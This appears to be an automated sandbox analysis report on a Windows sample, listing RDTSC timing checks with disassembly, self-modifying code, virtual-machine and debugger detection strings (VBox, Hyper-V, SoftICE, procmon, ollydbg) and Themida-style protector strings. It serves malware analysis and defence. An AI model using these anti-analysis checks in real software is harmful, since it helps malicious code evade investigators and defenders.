Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0B17 second address: 78E0B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0B1D second address: 78E0B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79309FF second address: 7930A37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 46E04484h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F04A523FCC6h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 push ecx 0x00000015 mov bx, DB50h 0x00000019 pop edx 0x0000001a movzx esi, bx 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ah, BEh 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7930A37 second address: 7930A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523AA91h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7910024 second address: 7910081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 288D735Bh 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F04A523FCBEh 0x00000017 and cx, 5F28h 0x0000001c jmp 00007F04A523FCBBh 0x00000021 popfd 0x00000022 jmp 00007F04A523FCC8h 0x00000027 popad 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e movsx ebx, ax 0x00000031 movzx eax, di 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7910081 second address: 79100BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 3ECDh 0x00000007 pushfd 0x00000008 jmp 00007F04A523AA8Ah 0x0000000d xor al, FFFFFFE8h 0x00000010 jmp 00007F04A523AA8Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 and esp, FFFFFFF0h 0x0000001c pushad 0x0000001d push ecx 0x0000001e movsx ebx, si 0x00000021 pop esi 0x00000022 mov di, 4130h 0x00000026 popad 0x00000027 sub esp, 44h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79100BC second address: 79100C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79100C0 second address: 79100C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79100C4 second address: 79100CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79100CA second address: 79100F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 78h 0x00000005 mov bx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F04A523AA96h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79100F0 second address: 79100F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79100F4 second address: 79100FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79100FA second address: 791010B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCBDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 791010B second address: 7910159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F04A523AA99h 0x00000011 pop esi 0x00000012 pushfd 0x00000013 jmp 00007F04A523AA91h 0x00000018 adc ch, FFFFFFD6h 0x0000001b jmp 00007F04A523AA91h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7910159 second address: 791017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F04A523FCBDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 791017E second address: 7910184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7910184 second address: 7910188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7910188 second address: 7910265 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F04A523AA94h 0x0000000e mov dword ptr [esp], esi 0x00000011 jmp 00007F04A523AA90h 0x00000016 xchg eax, edi 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F04A523AA8Eh 0x0000001e jmp 00007F04A523AA95h 0x00000023 popfd 0x00000024 push eax 0x00000025 pushfd 0x00000026 jmp 00007F04A523AA97h 0x0000002b adc cx, AEDEh 0x00000030 jmp 00007F04A523AA99h 0x00000035 popfd 0x00000036 pop eax 0x00000037 popad 0x00000038 push eax 0x00000039 pushad 0x0000003a mov dh, ch 0x0000003c call 00007F04A523AA99h 0x00000041 call 00007F04A523AA90h 0x00000046 pop eax 0x00000047 pop ebx 0x00000048 popad 0x00000049 xchg eax, edi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d call 00007F04A523AA93h 0x00000052 pop ecx 0x00000053 mov ax, di 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7910265 second address: 791029B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx ebx, ax 0x00000012 jmp 00007F04A523FCC6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 791029B second address: 7910317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+24h], 00000000h 0x00000011 pushad 0x00000012 jmp 00007F04A523AA95h 0x00000017 call 00007F04A523AA90h 0x0000001c call 00007F04A523AA92h 0x00000021 pop eax 0x00000022 pop edi 0x00000023 popad 0x00000024 lock bts dword ptr [edi], 00000000h 0x00000029 jmp 00007F04A523AA8Eh 0x0000002e jc 00007F0514F6CBBFh 0x00000034 jmp 00007F04A523AA90h 0x00000039 pop edi 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7910317 second address: 7910334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7910334 second address: 791036F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 pushfd 0x00000007 jmp 00007F04A523AA98h 0x0000000c sbb ecx, 1319E108h 0x00000012 jmp 00007F04A523AA8Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 791036F second address: 7910373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7910373 second address: 7910379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7910379 second address: 79103AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 mov bx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c jmp 00007F04A523FCBEh 0x00000011 mov esp, ebp 0x00000013 pushad 0x00000014 mov al, 39h 0x00000016 mov ax, di 0x00000019 popad 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F04A523FCC0h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79103AF second address: 79103B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940971 second address: 79409A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F04A523FCC1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79409A7 second address: 79409BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79409BA second address: 7940A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d pushfd 0x0000000e jmp 00007F04A523FCC3h 0x00000013 add si, 907Eh 0x00000018 jmp 00007F04A523FCC9h 0x0000001d popfd 0x0000001e pop eax 0x0000001f push edi 0x00000020 pushad 0x00000021 popad 0x00000022 pop ecx 0x00000023 popad 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940A1B second address: 7940A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940A1F second address: 7940A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940A23 second address: 7940A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7930930 second address: 7930957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F04A523FCBEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7930957 second address: 7930969 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523AA8Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7930969 second address: 793096D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940C25 second address: 7940C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940C29 second address: 7940C2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940C2F second address: 7940C50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940C50 second address: 7940C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940C55 second address: 7940C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523AA8Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940C64 second address: 7940CB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F04A523FCC5h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 push ebx 0x00000012 mov si, 43D5h 0x00000016 pop eax 0x00000017 popad 0x00000018 push dword ptr [ebp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F04A523FCBAh 0x00000024 adc ax, 40A8h 0x00000029 jmp 00007F04A523FCBBh 0x0000002e popfd 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940CB0 second address: 7940CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940CB5 second address: 7940D16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F04A523FCC5h 0x00000008 pushfd 0x00000009 jmp 00007F04A523FCC0h 0x0000000e adc ecx, 7A346E38h 0x00000014 jmp 00007F04A523FCBBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push dword ptr [ebp+0Ch] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov edi, 48172E26h 0x00000028 jmp 00007F04A523FCC7h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940D16 second address: 7940D2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523AA94h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940D2E second address: 7940D7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov cx, bx 0x00000014 pushfd 0x00000015 jmp 00007F04A523FCC7h 0x0000001a adc cl, 0000006Eh 0x0000001d jmp 00007F04A523FCC9h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940D7E second address: 7940D8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523AA8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940D8E second address: 7940D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79A05FE second address: 79A0603 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79A0603 second address: 79A0643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F04A523FCC2h 0x0000000a jmp 00007F04A523FCC5h 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F04A523FCBDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79A0643 second address: 79A0738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 mov dx, E25Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f movzx eax, dx 0x00000012 pushfd 0x00000013 jmp 00007F04A523AA97h 0x00000018 xor si, E7BEh 0x0000001d jmp 00007F04A523AA99h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F04A523AA8Ch 0x0000002c jmp 00007F04A523AA95h 0x00000031 popfd 0x00000032 mov bl, cl 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 pushad 0x00000038 push ebx 0x00000039 pushad 0x0000003a popad 0x0000003b pop eax 0x0000003c jmp 00007F04A523AA8Bh 0x00000041 popad 0x00000042 mov dl, byte ptr [ebp+14h] 0x00000045 jmp 00007F04A523AA96h 0x0000004a mov eax, dword ptr [ebp+10h] 0x0000004d jmp 00007F04A523AA90h 0x00000052 and dl, 00000007h 0x00000055 jmp 00007F04A523AA90h 0x0000005a test eax, eax 0x0000005c jmp 00007F04A523AA90h 0x00000061 je 00007F0514F0055Fh 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F04A523AA97h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79A0738 second address: 79A0750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79A0750 second address: 79A0754 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79A0754 second address: 79A077F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 00000000h 0x0000000d jmp 00007F04A523FCBCh 0x00000012 inc ecx 0x00000013 pushad 0x00000014 mov si, 9D9Dh 0x00000018 call 00007F04A523FCBAh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79A077F second address: 79A0793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 shr eax, 1 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F04A523AA8Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79A0793 second address: 79A07A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCBEh 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSpecial instruction interceptor: First address: 12C1B9F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSpecial instruction interceptor: First address: 12C1C5B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSpecial instruction interceptor: First address: 12BF51A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSpecial instruction interceptor: First address: 14F67FC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_2_07920C3A rdtsc 4_2_07920C3A
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeAPI coverage: 3.3 %
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: NWJ4JvzFcs.exe, NWJ4JvzFcs.exe, 00000004.00000002.1439118243.0000000001455000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: NWJ4JvzFcs.exe, 00000004.00000003.1433408114.000000000209A000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1440149452.00000000020A6000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433444924.000000000209D000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433998061.00000000020A5000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433028545.0000000002095000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj'M
Source: NWJ4JvzFcs.exeBinary or memory string: Hyper-V RAW
Source: NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: NWJ4JvzFcs.exe, 00000004.00000002.1439118243.0000000001455000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_2_079B0812 Start: 079B08CC End: 079B08AF4_2_079B0812
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeFile opened: NTICE
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeFile opened: SICE
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeCode function: 4_2_07920C3A rdtsc 4_2_07920C3A
Source: NWJ4JvzFcs.exe, NWJ4JvzFcs.exe, 00000004.00000002.1439118243.0000000001455000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: [Program Manager
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: procmon.exe
